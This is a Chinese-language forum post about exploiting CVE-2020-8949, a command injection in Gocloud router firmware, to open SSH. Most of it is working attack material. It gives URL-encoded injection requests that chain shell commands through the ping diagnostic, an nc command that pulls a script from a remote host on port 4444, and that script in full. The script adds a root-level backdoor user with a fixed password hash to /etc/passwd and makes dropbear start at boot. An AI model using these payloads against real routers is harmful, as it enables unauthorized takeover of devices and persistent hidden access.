|
主要参考Gocloud高恪固件CVE-2020-8949漏洞利用打开SSH(poc支持5.2最新版测试通过)
底包版本:4.0.2.12651
功能包版本:5.2.0.19646 (漏洞确实存在)
记录几条命令:- reboot
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60reboot%60/5/6/a.com
- nc 192.168.77.166 4444 > a.sh
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60nc%20192.168.1.166%204444%20%3E%20a.sh%60/5/6/a.com
- ls -l (两种写法, 效果相同)
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60ls%20-l%60/5/6/a.com
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bls%20-l%202%3E%261%3B%20/5/6/a.com
- chmod +x a.sh
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60chmod%20%2Bx%20a.sh%60/5/6/a.com
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bchmod%20%2Bx%20a.sh%202%3E%261%3B%20/5/6/a.com
- sh a.sh
- http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bsh%20%20a.sh%202%3E%261%3B%20/5/6/a.com
复制代码
a.sh的内容(完全照抄参考文):
- #!/bin/sh
- # ls -l /etc/dropbear
- # ls -l /etc/init.d
- # ls -l /etc/rc.d
- # cat /etc/init.d/dropbear
- # cat /etc/init.d/rcS
- echo "Generate host key"
- rm -rf /etc/dropbear/dropbear_rsa_host_key
- rm -rf /etc/dropbear/dropbear_dss_host_key
- /usr/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
- /usr/bin/dropbearkey -t dss -f /etc/dropbear/dropbear_dss_host_key
- # echo "Exec /etc/init.d/dropbear"
- # chmod +x /etc/init.d/dropbear
- # /etc/init.d/dropbear enable
- # /etc/init.d/dropbear start
- echo "Check host key"
- ls -l /etc/dropbear
- date
- echo "Add User sumu password admin"
- cat>>/etc/passwd<<EOF
- sumu:\$1\$aLBvC2Ao\$E4V2uG3GNwhlWczjZXb.31:0:0:root:/root:/bin/ash
- EOF
- echo "Update /etc/rc.local"
- cat>/etc/rc.local<<EOF
- # Put your custom commands here that should be executed once
- # the system init finished. By default this file does nothing.
- # /etc/init.d/dropbear start
- /usr/sbin/dropbear
- exit 0
- EOF
- echo "Check /etc/rc.local"
- cat /etc/rc.local
- echo "Start dropbear"
- dropbear
复制代码
执行脚本后得到了如下回显信息:
从 "Check host key" 步骤就开始出错了, 似乎路径不对..
请大侠指点
最新的5.2.0.20018漏洞似乎还没找到...
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
×
|